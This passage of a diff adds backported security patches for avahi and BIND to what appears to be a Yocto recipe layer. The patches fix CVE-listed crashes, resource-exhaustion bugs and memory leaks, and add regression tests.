+ #8 0x7f1581d77186 in __assert_fail (/lib64/libc.so.6+0x36186) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #9 0x5344a4 in LLVMFuzzerTestOneInput /home/vagrant/avahi/fuzz/fuzz-domain.c:38:9
+```
+
+It's a follow-up to 94cb6489114636940ac683515417990b55b5d66c
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/20dec84b2480821704258bc908e7b2bd2e883b24]
+CVE: CVE-2023-38470 #Follow-up patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -210,7 +210,8 @@ char *avahi_normalize_name(const char *s
+ } else
+ empty = 0;
+
+- avahi_escape_label(label, strlen(label), &r, &size);
++ if (!(avahi_escape_label(label, strlen(label), &r, &size)))
++ return NULL;
+ }
+
+ return ret_s;
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
new file mode 100644
index 0000000000..c8d6a66174
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
@@ -0,0 +1,73 @@
+From 894f085f402e023a98cbb6f5a3d117bd88d93b09 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Mon, 23 Oct 2023 13:38:35 +0200
+Subject: [PATCH] core: extract host name using avahi_unescape_label()
+
+Previously we could create invalid escape sequence when we split the
+string on dot. For example, from valid host name "foo\\.bar" we have
+created invalid name "foo\\" and tried to set that as the host name
+which crashed the daemon.
+
+Fixes #453
+
+CVE-2023-38471
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/894f085f402e023a98cbb6f5a3d117bd88d93b09]
+CVE: CVE-2023-38471
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 27 +++++++++++++++++++++------
+ 1 file changed, 21 insertions(+), 6 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1253,7 +1253,11 @@ static void update_fqdn(AvahiServer *s)
+ }
+
+ int avahi_server_set_host_name(AvahiServer *s, const char *host_name) {
+- char *hn = NULL;
++ char label_escaped[AVAHI_LABEL_MAX*4+1];
++ char label[AVAHI_LABEL_MAX];
++ char *hn = NULL, *h;
++ size_t len;
++
+ assert(s);
+
+ AVAHI_CHECK_VALIDITY(s, !host_name || avahi_is_valid_host_name(host_name), AVAHI_ERR_INVALID_HOST_NAME);
+@@ -1263,17 +1267,28 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
+- hn[strcspn(hn, ".")] = 0;
++ h = hn;
++ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
++ avahi_free(h);
++ return AVAHI_ERR_INVALID_HOST_NAME;
++ }
++
++ avahi_free(h);
+
+- if (avahi_domain_equal(s->host_name, hn) && s->state != AVAHI_SERVER_COLLISION) {
+- avahi_free(hn);
++ h = label_escaped;
++ len = sizeof(label_escaped);
++ if (!avahi_escape_label(label, strlen(label), &h, &len))
++ return AVAHI_ERR_INVALID_HOST_NAME;
++
++ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+- }
+
+ withdraw_host_rrs(s);
+
+ avahi_free(s->host_name);
+- s->host_name = hn;
++ s->host_name = avahi_strdup(label_escaped);
++ if (!s->host_name)
++ return AVAHI_ERR_NO_MEMORY;
+
+ update_fqdn(s);
+
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
new file mode 100644
index 0000000000..a789b144ed
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
@@ -0,0 +1,52 @@
+From b675f70739f404342f7f78635d6e2dcd85a13460 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 24 Oct 2023 22:04:51 +0000
+Subject: [PATCH] core: return errors from avahi_server_set_host_name properly
+
+It's a follow-up to 894f085f402e023a98cbb6f5a3d117bd88d93b09
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b675f70739f404342f7f78635d6e2dcd85a13460]
+CVE: CVE-2023-38471 #Follow-up Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1267,10 +1267,13 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
++ if (!hn)
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
++
+ h = hn;
+ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
+ avahi_free(h);
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+ }
+
+ avahi_free(h);
+@@ -1278,7 +1281,7 @@ int avahi_server_set_host_name(AvahiServ
+ h = label_escaped;
+ len = sizeof(label_escaped);
+ if (!avahi_escape_label(label, strlen(label), &h, &len))
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+
+ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+@@ -1288,7 +1291,7 @@ int avahi_server_set_host_name(AvahiServ
+ avahi_free(s->host_name);
+ s->host_name = avahi_strdup(label_escaped);
+ if (!s->host_name)
+- return AVAHI_ERR_NO_MEMORY;
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
+
+ update_fqdn(s);
+
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
new file mode 100644
index 0000000000..f49d990a42
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
@@ -0,0 +1,45 @@
+From b024ae5749f4aeba03478e6391687c3c9c8dee40 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Thu, 19 Oct 2023 17:36:44 +0200
+Subject: [PATCH] core: make sure there is rdata to process before parsing it
+
+Fixes #452
+
+CVE-2023-38472
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38472.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b024ae5749f4aeba03478e6391687c3c9c8dee40]
+CVE: CVE-2023-38472
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 3 +++
+ avahi-daemon/dbus-entry-group.c | 2 +-
+ 2 files changed, 4 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -272,6 +272,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ assert(error == AVAHI_ERR_INVALID_RECORD);
+ avahi_string_list_free(txt);
+
++ error = avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0);
++ assert(error != AVAHI_OK);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
+Index: avahi-0.7/avahi-daemon/dbus-entry-group.c
+===================================================================
+--- avahi-0.7.orig/avahi-daemon/dbus-entry-group.c
++++ avahi-0.7/avahi-daemon/dbus-entry-group.c
+@@ -340,7 +340,7 @@ DBusHandlerResult avahi_dbus_msg_entry_g
+ if (!(r = avahi_record_new_full (name, clazz, type, ttl)))
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NO_MEMORY, NULL);
+
+- if (avahi_rdata_parse (r, rdata, size) < 0) {
++ if (!rdata || avahi_rdata_parse (r, rdata, size) < 0) {
+ avahi_record_unref (r);
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_INVALID_RDATA, NULL);
+ }
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
new file mode 100644
index 0000000000..59f6806c85
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
@@ -0,0 +1,109 @@
+From b448c9f771bada14ae8de175695a9729f8646797 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Wed, 11 Oct 2023 17:45:44 +0200
+Subject: [PATCH] common: derive alternative host name from its unescaped
+ version
+
+Normalization of input makes sure we don't have to deal with special
+cases like unescaped dot at the end of label.
+
+Fixes #451 #487
+CVE-2023-38473
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38473.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b448c9f771bada14ae8de175695a9729f8646797]
+CVE: CVE-2023-38473
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/alternative-test.c | 3 +++
+ avahi-common/alternative.c | 27 +++++++++++++++++++--------
+ 2 files changed, 22 insertions(+), 8 deletions(-)
+
+Index: avahi-0.7/avahi-common/alternative-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative-test.c
++++ avahi-0.7/avahi-common/alternative-test.c
+@@ -31,6 +31,9 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ const char* const test_strings[] = {
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXüüüüüüü",
++ ").",
++ "\\.",
++ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\\",
+ "gurke",
+ "-",
+ " #",
+Index: avahi-0.7/avahi-common/alternative.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative.c
++++ avahi-0.7/avahi-common/alternative.c
+@@ -49,15 +49,20 @@ static void drop_incomplete_utf8(char *c
+ }
+
+ char *avahi_alternative_host_name(const char *s) {
++ char label[AVAHI_LABEL_MAX], alternative[AVAHI_LABEL_MAX*4+1];
++ char *alt, *r, *ret;
+ const char *e;
+- char *r;
++ size_t len;
+
+ assert(s);
+
+ if (!avahi_is_valid_host_name(s))
+ return NULL;
+
+- if ((e = strrchr(s, '-'))) {
++ if (!avahi_unescape_label(&s, label, sizeof(label)))
++ return NULL;
++
++ if ((e = strrchr(label, '-'))) {
+ const char *p;
+
+ e++;
+@@ -74,19 +79,18 @@ char *avahi_alternative_host_name(const
+
+ if (e) {
+ char *c, *m;
+- size_t l;
+ int n;
+
+ n = atoi(e)+1;
+ if (!(m = avahi_strdup_printf("%i", n)))
+ return NULL;
+
+- l = e-s-1;
++ len = e-label-1;
+
+- if (l >= AVAHI_LABEL_MAX-1-strlen(m)-1)
+- l = AVAHI_LABEL_MAX-1-strlen(m)-1;
++ if (len >= AVAHI_LABEL_MAX-1-strlen(m)-1)
++ len = AVAHI_LABEL_MAX-1-strlen(m)-1;
+
+- if (!(c = avahi_strndup(s, l))) {
++ if (!(c = avahi_strndup(label, len))) {
+ avahi_free(m);
+ return NULL;
+ }
+@@ -100,7 +104,7 @@ char *avahi_alternative_host_name(const
+ } else {
+ char *c;
+
+- if (!(c = avahi_strndup(s, AVAHI_LABEL_MAX-1-2)))
++ if (!(c = avahi_strndup(label, AVAHI_LABEL_MAX-1-2)))
+ return NULL;
+
+ drop_incomplete_utf8(c);
+@@ -109,6 +113,13 @@ char *avahi_alternative_host_name(const
+ avahi_free(c);
+ }
+
++ alt = alternative;
++ len = sizeof(alternative);
++ ret = avahi_escape_label(r, strlen(r), &alt, &len);
++
++ avahi_free(r);
++ r = avahi_strdup(ret);
++
+ assert(avahi_is_valid_host_name(r));
+
+ return r;
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
new file mode 100644
index 0000000000..940c6776d3
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
@@ -0,0 +1,67 @@
+From 36c878a0124973f29b7ca49e6bb18310f9b2601f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Micha=C5=82=20K=C4=99pie=C5=84?= <michal@isc.org>
+Date: Thu, 8 Sep 2022 11:11:30 +0200
+Subject: [PATCH 1/3] Bound the amount of work performed for delegations
+
+Limit the amount of database lookups that can be triggered in
+fctx_getaddresses() (i.e. when determining the name server addresses to
+query next) by setting a hard limit on the number of NS RRs processed
+for any delegation encountered. Without any limit in place, named can
+be forced to perform large amounts of database lookups per each query
+received, which severely impacts resolver performance.
+
+The limit used (20) is an arbitrary value that is considered to be big
+enough for any sane DNS delegation.
+
+(cherry picked from commit 3a44097fd6c6c260765b628cd1d2c9cb7efb0b2a)
+
+Upstream-Status: Backport
+CVE: CVE-2022-2795
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/bf2ea6d8525bfd96a84dad221ba9e004adb710a8
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/resolver.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/lib/dns/resolver.c b/lib/dns/resolver.c
+index 8ae9a993bbd7..ac9a9ef5d009 100644
+--- a/lib/dns/resolver.c
++++ b/lib/dns/resolver.c
+@@ -180,6 +180,12 @@
+ */
+ #define NS_FAIL_LIMIT 4
+ #define NS_RR_LIMIT 5
++/*
++ * IP address lookups are performed for at most NS_PROCESSING_LIMIT NS RRs in
++ * any NS RRset encountered, to avoid excessive resource use while processing
++ * large delegations.
++ */
++#define NS_PROCESSING_LIMIT 20
+
+ /* Number of hash buckets for zone counters */
+ #ifndef RES_DOMAIN_BUCKETS
+@@ -3318,6 +3324,7 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+ bool need_alternate = false;
+ bool all_spilled = true;
+ unsigned int no_addresses = 0;
++ unsigned int ns_processed = 0;
+
+ FCTXTRACE5("getaddresses", "fctx->depth=", fctx->depth);
+
+@@ -3504,6 +3511,11 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+
+ dns_rdata_reset(&rdata);
+ dns_rdata_freestruct(&ns);
++
++ if (++ns_processed >= NS_PROCESSING_LIMIT) {
++ result = ISC_R_NOMORE;
++ break;
++ }
+ }
+ if (result != ISC_R_NOMORE) {
+ return (result);
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
new file mode 100644
index 0000000000..0ef87fd260
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
@@ -0,0 +1,31 @@
+From ef3d1a84ff807eea27b4fef601a15932c5ffbfbf Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:15:34 +1000
+Subject: [PATCH 2/3] Free eckey on siglen mismatch
+
+Upstream-Status: Backport
+CVE: CVE-2022-38177
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/5b2282afff760b1ed3471f6666bdfe8e1d34e590
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/opensslecdsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/opensslecdsa_link.c b/lib/dns/opensslecdsa_link.c
+index 83b5b51cd78c..7576e04ac635 100644
+--- a/lib/dns/opensslecdsa_link.c
++++ b/lib/dns/opensslecdsa_link.c
+@@ -224,7 +224,7 @@ opensslecdsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ siglen = DNS_SIG_ECDSA384SIZE;
+
+ if (sig->length != siglen)
+- return (DST_R_VERIFYFAILURE);
++ DST_RET(DST_R_VERIFYFAILURE);
+
+ if (!EVP_DigestFinal_ex(evp_md_ctx, digest, &dgstlen))
+ DST_RET (dst__openssl_toresult3(dctx->category,
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
new file mode 100644
index 0000000000..e0b398e24a
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
@@ -0,0 +1,33 @@
+From 65f5b2f0162d5d2ab25f463aa14a8bae71ace3d9 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:28:13 +1000
+Subject: [PATCH 3/3] Free ctx on invalid siglen
+
+(cherry picked from commit 6ddb480a84836641a0711768a94122972c166825)
+
+Upstream-Status: Backport
+CVE: CVE-2022-38178
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/1af23378ebb11da2eb0f412e4563d6
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/openssleddsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/openssleddsa_link.c b/lib/dns/openssleddsa_link.c
+index 8b115ec283f0..b4fcd607c131 100644
+--- a/lib/dns/openssleddsa_link.c
++++ b/lib/dns/openssleddsa_link.c
+@@ -325,7 +325,7 @@ openssleddsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ siglen = DNS_SIG_ED448SIZE;
+
+ if (sig->length != siglen)
+- return (DST_R_VERIFYFAILURE);
++ DST_RET(ISC_R_NOTIMPLEMENTED);
+
+ isc_buffer_usedregion(buf, &tbsreg);
+
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
new file mode 100644
index 0000000000..6f6c104530
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
@@ -0,0 +1,166 @@
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/b/bind9/bind9_9.11.5.P4+dfsg-5.1+deb10u9.debian.tar.xz
+Upstream patch https://downloads.isc.org/isc/bind9/9.16.42/patches/0001-CVE-2023-2828.patch]
+Upstream Commit: https://github.com/isc-projects/bind9/commit/da0eafcdee52147e72d407cc3b9f179378ee1d3a
+CVE: CVE-2023-2828
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+
+---
+ lib/dns/rbtdb.c | 106 +++++++++++++++++++++++++++++++++-----------------------
+ 1 file changed, 63 insertions(+), 43 deletions(-)
+
+diff --git a/lib/dns/rbtdb.c b/lib/dns/rbtdb.c
+index b1b928c..3165e26 100644
+--- a/lib/dns/rbtdb.c
++++ b/lib/dns/rbtdb.c
+@@ -792,7 +792,7 @@ static void update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ static void expire_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ bool tree_locked, expire_t reason);
+ static void overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+- isc_stdtime_t now, bool tree_locked);
++ size_t purgesize, bool tree_locked);
+ static isc_result_t resign_insert(dns_rbtdb_t *rbtdb, int idx,
+ rdatasetheader_t *newheader);
+ static void resign_delete(dns_rbtdb_t *rbtdb, rbtdb_version_t *version,
+@@ -6784,6 +6784,16 @@ addclosest(dns_rbtdb_t *rbtdb, rdatasetheader_t *newheader,
+
+ static dns_dbmethods_t zone_methods;
+
++static size_t
++rdataset_size(rdatasetheader_t *header) {
++ if (!NONEXISTENT(header)) {
++ return (dns_rdataslab_size((unsigned char *)header,
++ sizeof(*header)));
++ }
++
++ return (sizeof(*header));
++}
++
+ static isc_result_t
+ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ isc_stdtime_t now, dns_rdataset_t *rdataset, unsigned int options,
+@@ -6932,7 +6942,8 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ }
+
+ if (cache_is_overmem)
+- overmem_purge(rbtdb, rbtnode->locknum, now, tree_locked);
++ overmem_purge(rbtdb, rbtnode->locknum, rdataset_size(newheader),
++ tree_locked);
+
+ NODE_LOCK(&rbtdb->node_locks[rbtnode->locknum].lock,
+ isc_rwlocktype_write);
+@@ -6947,9 +6958,14 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ cleanup_dead_nodes(rbtdb, rbtnode->locknum);
+
+ header = isc_heap_element(rbtdb->heaps[rbtnode->locknum], 1);
+- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL)
+- expire_header(rbtdb, header, tree_locked,
+- expire_ttl);
++ if (header != NULL) {
++ dns_ttl_t rdh_ttl = header->rdh_ttl;
++
++ if (rdh_ttl < now - RBTDB_VIRTUAL) {
++ expire_header(rbtdb, header, tree_locked,
++ expire_ttl);
++ }
++ }
+
+ /*
+ * If we've been holding a write lock on the tree just for
+@@ -10388,54 +10404,58 @@ update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ ISC_LIST_PREPEND(rbtdb->rdatasets[header->node->locknum], header, link);
+ }
+
++static size_t
++expire_lru_headers(dns_rbtdb_t *rbtdb, unsigned int locknum, size_t purgesize,
++ bool tree_locked) {
++ rdatasetheader_t *header, *header_prev;
++ size_t purged = 0;
++
++ for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
++ header != NULL && purged <= purgesize; header = header_prev)
++ {
++ header_prev = ISC_LIST_PREV(header, link);
++ /*
++ * Unlink the entry at this point to avoid checking it
++ * again even if it's currently used someone else and
++ * cannot be purged at this moment. This entry won't be
++ * referenced any more (so unlinking is safe) since the
++ * TTL was reset to 0.
++ */
++ ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header, link);
++ size_t header_size = rdataset_size(header);
++ expire_header(rbtdb, header, tree_locked, expire_lru);
++ purged += header_size;
++ }
++
++ return (purged);
++}
++
+ /*%
+- * Purge some expired and/or stale (i.e. unused for some period) cache entries
+- * under an overmem condition. To recover from this condition quickly, up to
+- * 2 entries will be purged. This process is triggered while adding a new
+- * entry, and we specifically avoid purging entries in the same LRU bucket as
+- * the one to which the new entry will belong. Otherwise, we might purge
+- * entries of the same name of different RR types while adding RRsets from a
+- * single response (consider the case where we're adding A and AAAA glue records
+- * of the same NS name).
+- */
++ * Purge some stale (i.e. unused for some period - LRU based cleaning) cache
++ * entries under the overmem condition. To recover from this condition quickly,
++ * we cleanup entries up to the size of newly added rdata (passed as purgesize).
++ *
++ * This process is triggered while adding a new entry, and we specifically avoid
++ * purging entries in the same LRU bucket as the one to which the new entry will
++ * belong. Otherwise, we might purge entries of the same name of different RR
++ * types while adding RRsets from a single response (consider the case where
++ * we're adding A and AAAA glue records of the same NS name).
++*/
+ static void
+-overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+- isc_stdtime_t now, bool tree_locked)
++overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start, size_t purgesize,
++ bool tree_locked)
+ {
+- rdatasetheader_t *header, *header_prev;
+ unsigned int locknum;
+- int purgecount = 2;
++ size_t purged = 0;
+
+ for (locknum = (locknum_start + 1) % rbtdb->node_lock_count;
+- locknum != locknum_start && purgecount > 0;
++ locknum != locknum_start && purged <= purgesize;
+ locknum = (locknum + 1) % rbtdb->node_lock_count) {
+ NODE_LOCK(&rbtdb->node_locks[locknum].lock,
+ isc_rwlocktype_write);
+
+- header = isc_heap_element(rbtdb->heaps[locknum], 1);
+- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL) {
+- expire_header(rbtdb, header, tree_locked,
+- expire_ttl);
+- purgecount--;
+- }
+-
+- for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
+- header != NULL && purgecount > 0;
+- header = header_prev) {
+- header_prev = ISC_LIST_PREV(header, link);
+- /*
+- * Unlink the entry at this point to avoid checking it
+- * again even if it's currently used someone else and
+- * cannot be purged at this moment. This entry won't be
+- * referenced any more (so unlinking is safe) since the
+- * TTL was reset to 0.
+- */
+- ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header,
+- link);
+- expire_header(rbtdb, header, tree_locked,
+- expire_lru);
+- purgecount--;
+- }
++ purged += expire_lru_headers(rbtdb, locknum, purgesize - purged,
++ tree_locked);
+
+ NODE_UNLOCK(&rbtdb->node_locks[locknum].lock,
+ isc_rwlocktype_write);
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
new file mode 100644
index 0000000000..be479cb00e
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
@@ -0,0 +1,175 @@
+From c4fac5ca98efd02fbaef43601627c7a3a09f5a71 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Tue, 20 Jun 2023 15:21:36 +1000
+Subject: [PATCH] Limit isccc_cc_fromwire recursion depth
+
+Named and rndc do not need a lot of recursion so the depth is
+set to 10.
+
+Taken from BIND 9.16.44 change.
+
+Upstream-Status: Backport [https://gitlab.isc.org/isc-projects/bind9/-/commit/c4fac5ca98efd02fbaef43601627c7a3a09f5a71]
+CVE: CVE-2023-3341
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/isccc/cc.c | 38 +++++++++++++++++++++++---------
+ lib/isccc/include/isccc/result.h | 4 +++-
+ lib/isccc/result.c | 4 +++-
+ 3 files changed, 34 insertions(+), 12 deletions(-)
+
+diff --git a/lib/isccc/cc.c b/lib/isccc/cc.c
+index e012685..8eac3d6 100644
+--- a/lib/isccc/cc.c
++++ b/lib/isccc/cc.c
+@@ -53,6 +53,10 @@
+
+ #define MAX_TAGS 256
+ #define DUP_LIFETIME 900
++#ifndef ISCCC_MAXDEPTH
++#define ISCCC_MAXDEPTH \
++ 10 /* Big enough for rndc which just sends a string each way. */
++#endif
+
+ typedef isccc_sexpr_t *sexpr_ptr;
+
+@@ -561,19 +565,25 @@ verify(isccc_sexpr_t *alist, unsigned char *data, unsigned int length,
+
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+- uint32_t algorithm, isccc_sexpr_t **alistp);
++ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp);
+
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp);
++list_fromwire(isccc_region_t *source, unsigned int depth,
++ isccc_sexpr_t **listp);
+
+ static isc_result_t
+-value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
++value_fromwire(isccc_region_t *source, unsigned int depth,
++ isccc_sexpr_t **valuep) {
+ unsigned int msgtype;
+ uint32_t len;
+ isccc_sexpr_t *value;
+ isccc_region_t active;
+ isc_result_t result;
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ if (REGION_SIZE(*source) < 1 + 4)
+ return (ISC_R_UNEXPECTEDEND);
+ GET8(msgtype, source->rstart);
+@@ -591,9 +601,9 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+ } else
+ result = ISC_R_NOMEMORY;
+ } else if (msgtype == ISCCC_CCMSGTYPE_TABLE)
+- result = table_fromwire(&active, NULL, 0, valuep);
++ result = table_fromwire(&active, NULL, 0, depth + 1, valuep);
+ else if (msgtype == ISCCC_CCMSGTYPE_LIST)
+- result = list_fromwire(&active, valuep);
++ result = list_fromwire(&active, depth + 1, valuep);
+ else
+ result = ISCCC_R_SYNTAX;
+
+@@ -602,7 +612,7 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+- uint32_t algorithm, isccc_sexpr_t **alistp)
++ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp)
+ {
+ char key[256];
+ uint32_t len;
+@@ -613,6 +623,10 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+
+ REQUIRE(alistp != NULL && *alistp == NULL);
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
